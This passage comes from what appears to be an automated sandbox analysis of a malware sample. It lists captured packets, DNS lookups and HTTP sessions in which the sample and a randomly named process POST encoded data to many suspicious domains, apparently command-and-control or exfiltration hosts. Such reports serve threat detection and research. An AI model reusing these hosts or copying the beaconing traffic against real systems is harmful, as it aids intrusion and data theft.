                                                                                      Jan 10, 2025 19:55:07.031126022 CET805005113.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:07.682120085 CET805005113.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:07.682246923 CET805005113.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:07.682523012 CET5005180192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:08.538256884 CET5005180192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:09.558361053 CET5005280192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:09.563148975 CET805005213.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:09.563338041 CET5005280192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:09.580379963 CET5005280192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:09.585321903 CET805005213.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:09.585392952 CET805005213.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:10.037511110 CET805005213.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:10.037530899 CET805005213.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:10.037635088 CET5005280192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:11.251955986 CET5005280192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:12.260162115 CET5005380192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:12.265285015 CET805005313.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:12.265578985 CET5005380192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:12.276408911 CET5005380192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:12.284315109 CET805005313.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:12.760904074 CET805005313.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:12.760966063 CET805005313.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:55:12.761689901 CET5005380192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:12.763851881 CET5005380192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:55:12.768604994 CET805005313.248.169.48192.168.2.5

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 10, 2025 19:51:07.509839058 CET5631953192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:51:07.517009020 CET53563191.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:51:08.779933929 CET5289653192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:51:09.808480024 CET5289653192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:51:10.820513964 CET5289653192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:51:11.382911921 CET53528961.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:51:11.382946014 CET53528961.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:51:11.382956982 CET53528961.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:51:58.987731934 CET5638753192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:51:59.050841093 CET53563871.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:52:14.776340961 CET5782853192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:52:15.283444881 CET53578281.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:52:29.197993994 CET5297153192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:52:29.577748060 CET53529711.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:52:43.731466055 CET6360253192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:52:43.743428946 CET53636021.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:52:59.949680090 CET6271653192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:53:00.303483963 CET53627161.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:53:13.886181116 CET6274053192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:53:13.914586067 CET53627401.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:53:27.244549990 CET5208553192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:53:27.607283115 CET53520851.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:53:41.198472977 CET6245853192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:53:41.251254082 CET53624581.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:53:55.573098898 CET5449253192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:53:55.730894089 CET53544921.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:54:09.636996984 CET6065753192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:54:10.199364901 CET53606571.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:54:23.512139082 CET5525153192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:54:23.613487959 CET53552511.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:54:37.292018890 CET4985953192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:54:37.471127987 CET53498591.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:54:50.760884047 CET5792453192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:54:50.783523083 CET53579241.1.1.1192.168.2.5
                                                                                      Jan 10, 2025 19:55:04.420627117 CET5542453192.168.2.51.1.1.1
                                                                                      Jan 10, 2025 19:55:04.445195913 CET53554241.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 10, 2025 19:51:07.509839058 CET192.168.2.51.1.1.10x9a17Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:08.779933929 CET192.168.2.51.1.1.10xf84fStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:09.808480024 CET192.168.2.51.1.1.10xf84fStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:10.820513964 CET192.168.2.51.1.1.10xf84fStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:58.987731934 CET192.168.2.51.1.1.10x2aadStandard query (0)www.sunnyz.storeA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:14.776340961 CET192.168.2.51.1.1.10x6ee2Standard query (0)www.d48dk.topA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:29.197993994 CET192.168.2.51.1.1.10xe8e3Standard query (0)www.8312zcksnu.bondA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:43.731466055 CET192.168.2.51.1.1.10xd9cfStandard query (0)www.snyp.shopA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:59.949680090 CET192.168.2.51.1.1.10x7354Standard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:13.886181116 CET192.168.2.51.1.1.10xf58dStandard query (0)www.maitreyatoys.worldA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:27.244549990 CET192.168.2.51.1.1.10xda41Standard query (0)www.44ynh.topA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:41.198472977 CET192.168.2.51.1.1.10x1ab3Standard query (0)www.montero-beauty.onlineA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:55.573098898 CET192.168.2.51.1.1.10x82bdStandard query (0)www.beyondfitness.liveA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:09.636996984 CET192.168.2.51.1.1.10x77bbStandard query (0)www.50food.comA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:23.512139082 CET192.168.2.51.1.1.10x6388Standard query (0)www.dymar.shopA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:37.292018890 CET192.168.2.51.1.1.10x79eaStandard query (0)www.earbudsstore.shopA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:50.760884047 CET192.168.2.51.1.1.10xf715Standard query (0)www.oneeyetrousersnake.xyzA (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:55:04.420627117 CET192.168.2.51.1.1.10x1b8aStandard query (0)www.tals.xyzA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 10, 2025 19:51:02.512855053 CET1.1.1.1192.168.2.50x3111No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:02.512855053 CET1.1.1.1192.168.2.50x3111No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:07.517009020 CET1.1.1.1192.168.2.50x9a17No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:11.382911921 CET1.1.1.1192.168.2.50xf84fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:11.382946014 CET1.1.1.1192.168.2.50xf84fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:11.382956982 CET1.1.1.1192.168.2.50xf84fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:59.050841093 CET1.1.1.1192.168.2.50x2aadNo error (0)www.sunnyz.storewebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 10, 2025 19:51:59.050841093 CET1.1.1.1192.168.2.50x2aadNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:15.283444881 CET1.1.1.1192.168.2.50x6ee2No error (0)www.d48dk.topd48dk.topCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:15.283444881 CET1.1.1.1192.168.2.50x6ee2No error (0)d48dk.top154.23.184.207A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:29.577748060 CET1.1.1.1192.168.2.50xe8e3No error (0)www.8312zcksnu.bond38.165.29.234A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:43.743428946 CET1.1.1.1192.168.2.50xd9cfNo error (0)www.snyp.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:52:43.743428946 CET1.1.1.1192.168.2.50xd9cfNo error (0)www.snyp.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:00.303483963 CET1.1.1.1192.168.2.50x7354No error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:13.914586067 CET1.1.1.1192.168.2.50xf58dNo error (0)www.maitreyatoys.world194.245.148.189A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:27.607283115 CET1.1.1.1192.168.2.50xda41No error (0)www.44ynh.top44ynh.topCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:27.607283115 CET1.1.1.1192.168.2.50xda41No error (0)44ynh.top38.181.21.178A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:41.251254082 CET1.1.1.1192.168.2.50x1ab3No error (0)www.montero-beauty.online185.104.45.157A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:53:55.730894089 CET1.1.1.1192.168.2.50x82bdNo error (0)www.beyondfitness.live209.74.77.107A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:10.199364901 CET1.1.1.1192.168.2.50x77bbNo error (0)www.50food.com147.255.21.187A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:23.613487959 CET1.1.1.1192.168.2.50x6388No error (0)www.dymar.shop185.68.16.160A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:37.471127987 CET1.1.1.1192.168.2.50x79eaNo error (0)www.earbudsstore.shop194.195.220.41A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:50.783523083 CET1.1.1.1192.168.2.50xf715No error (0)www.oneeyetrousersnake.xyzoneeyetrousersnake.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:50.783523083 CET1.1.1.1192.168.2.50xf715No error (0)oneeyetrousersnake.xyz63.250.43.134A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:54:50.783523083 CET1.1.1.1192.168.2.50xf715No error (0)oneeyetrousersnake.xyz63.250.43.135A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:55:04.445195913 CET1.1.1.1192.168.2.50x1b8aNo error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                      Jan 10, 2025 19:55:04.445195913 CET1.1.1.1192.168.2.50x1b8aNo error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • pywolwnvd.biz
                                                                                      • www.sunnyz.store
                                                                                      • www.d48dk.top
                                                                                      • www.8312zcksnu.bond
                                                                                      • www.snyp.shop
                                                                                      • www.duwixushx.xyz
                                                                                      • www.maitreyatoys.world
                                                                                      • www.44ynh.top
                                                                                      • www.montero-beauty.online
                                                                                      • www.beyondfitness.live
                                                                                      • www.50food.com
                                                                                      • www.dymar.shop
                                                                                      • www.earbudsstore.shop
                                                                                      • www.oneeyetrousersnake.xyz
                                                                                      • www.tals.xyz

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.54973954.244.188.177806092C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:51:07.579591036 CET353OUTPOST /wlyolqts HTTP/1.1
                                                                                      Cache-Control: no-cache
                                                                                      Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Host: pywolwnvd.biz
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                      Content-Length: 804
                                                                                      Jan 10, 2025 19:51:07.579638004 CET804OUTData Raw: 9c 3f e7 28 e8 91 89 be 18 03 00 00 d8 15 1f 14 35 4c 6e f3 67 f4 e3 b3 9d b9 89 a2 92 4b 0b 0e 6b 02 ed 52 e5 a7 d7 04 2c 6a c0 a9 dd 02 dd 8e 1a 40 c4 34 36 ef 00 99 84 10 ba 87 94 5a b9 03 4d ac 1c 41 f3 2e 99 be 2c 44 2e 05 dd 86 2a 1e 91 65
                                                                                      Data Ascii: ?(5LngKkR,j@46ZMA.,D.*e-YQ)ybZRGjpmAs _x$)s<~b]d{1'k$c$%U98oqm5%&z+z:p|`|Y$jdaf`W!A7nTa
                                                                                      Jan 10, 2025 19:51:08.322750092 CET413INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:51:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: btst=cf418b115e545158dd8f818d001e4611|8.46.123.189|1736535068|1736535068|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                      Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549993217.70.184.50804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:51:59.073390961 CET523OUTGET /px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.sunnyz.store
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:51:59.687491894 CET1236INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:51:59 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Security-Policy: default-src 'self'; script-src 'nonce-39af284bafea439e9d7427f79dccfee5';
                                                                                      Vary: Accept-Language
                                                                                      Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 33 39 61 66 32 38 34 62 61 66 65 61 34 33 39 65 39 64 37 34 32 37 66 37 39 64 63 63 66 65 65 35 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                      Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-39af284bafea439e9d7427f79dccfee5';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                                                      Jan 10, 2025 19:51:59.687520027 CET1236INData Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                                                      Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                                                      Jan 10, 2025 19:51:59.687537909 CET155INData Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                                                      Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>
                                                                                      Jan 10, 2025 19:51:59.687551975 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549996154.23.184.207804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:15.403732061 CET768OUTPOST /9ffw/ HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.d48dk.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.d48dk.top/9ffw/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 4a 63 30 6c 4e 53 4f 49 4c 5a 62 6c 7a 6b 49 2f 57 46 46 33 4d 45 6e 78 63 57 73 49 54 58 61 73 75 68 4a 36 68 4e 4f 57 71 61 36 50 6f 50 49 6d 72 71 49 72 32 70 4d 51 51 74 56 49 43 59 76 30 42 77 38 55 2f 78 68 62 32 6d 49 75 5a 48 73 65 77 6e 75 36 74 6e 31 61 68 69 75 63 52 2b 32 50 51 66 63 4e 69 65 53 2f 31 51 2b 30 75 32 62 38 47 39 6b 6a 43 4b 73 78 33 67 6c 55 77 79 56 50 74 64 6f 54 75 72 62 67 41 56 55 31 58 75 79 38 61 57 34 5a 50 4b 58 31 76 69 6f 56 2f 64 5a 6a 6e 46 31 35 4c 31 61 73 55 51 38 45 6d 4f 4e 46 61 62 2f 62 72 74 74 2f 31 63 3d
                                                                                      Data Ascii: bbg=gCyAac3FM9KhZJc0lNSOILZblzkI/WFF3MEnxcWsITXasuhJ6hNOWqa6PoPImrqIr2pMQQtVICYv0Bw8U/xhb2mIuZHsewnu6tn1ahiucR+2PQfcNieS/1Q+0u2b8G9kjCKsx3glUwyVPtdoTurbgAVU1Xuy8aW4ZPKX1vioV/dZjnF15L1asUQ8EmONFab/brtt/1c=
                                                                                      Jan 10, 2025 19:52:16.251338959 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:16 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.549997154.23.184.207804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:18.061773062 CET788OUTPOST /9ffw/ HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.d48dk.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.d48dk.top/9ffw/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 6a 61 73 4d 70 4a 35 6c 52 4f 52 71 61 36 48 49 50 42 72 4c 71 48 72 32 6c 45 51 55 74 56 49 47 49 76 30 44 6f 38 56 4f 78 6d 62 6d 6d 57 68 35 47 4b 54 51 6e 75 36 74 6e 31 61 68 32 45 63 52 32 32 4f 68 76 63 4d 44 65 4e 68 6c 51 2f 33 75 32 62 76 57 39 67 6a 43 4c 4a 78 79 49 62 55 79 4b 56 50 70 5a 6f 51 2f 72 45 35 51 56 53 72 6e 76 45 33 50 6e 58 51 65 2b 69 33 74 7a 38 43 4d 70 39 6d 52 30 66 6a 70 39 79 2f 30 38 45 55 31 47 36 55 71 36 57 42 49 39 64 68 69 4b 70 79 50 77 4e 67 39 35 44 52 39 74 78 36 31 30 66 73 51 46 2b
                                                                                      Data Ascii: bbg=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/08EU1G6Uq6WBI9dhiKpyPwNg95DR9tx610fsQF+
                                                                                      Jan 10, 2025 19:52:19.076716900 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:18 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.549998154.23.184.207804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:20.684868097 CET1805OUTPOST /9ffw/ HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.d48dk.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
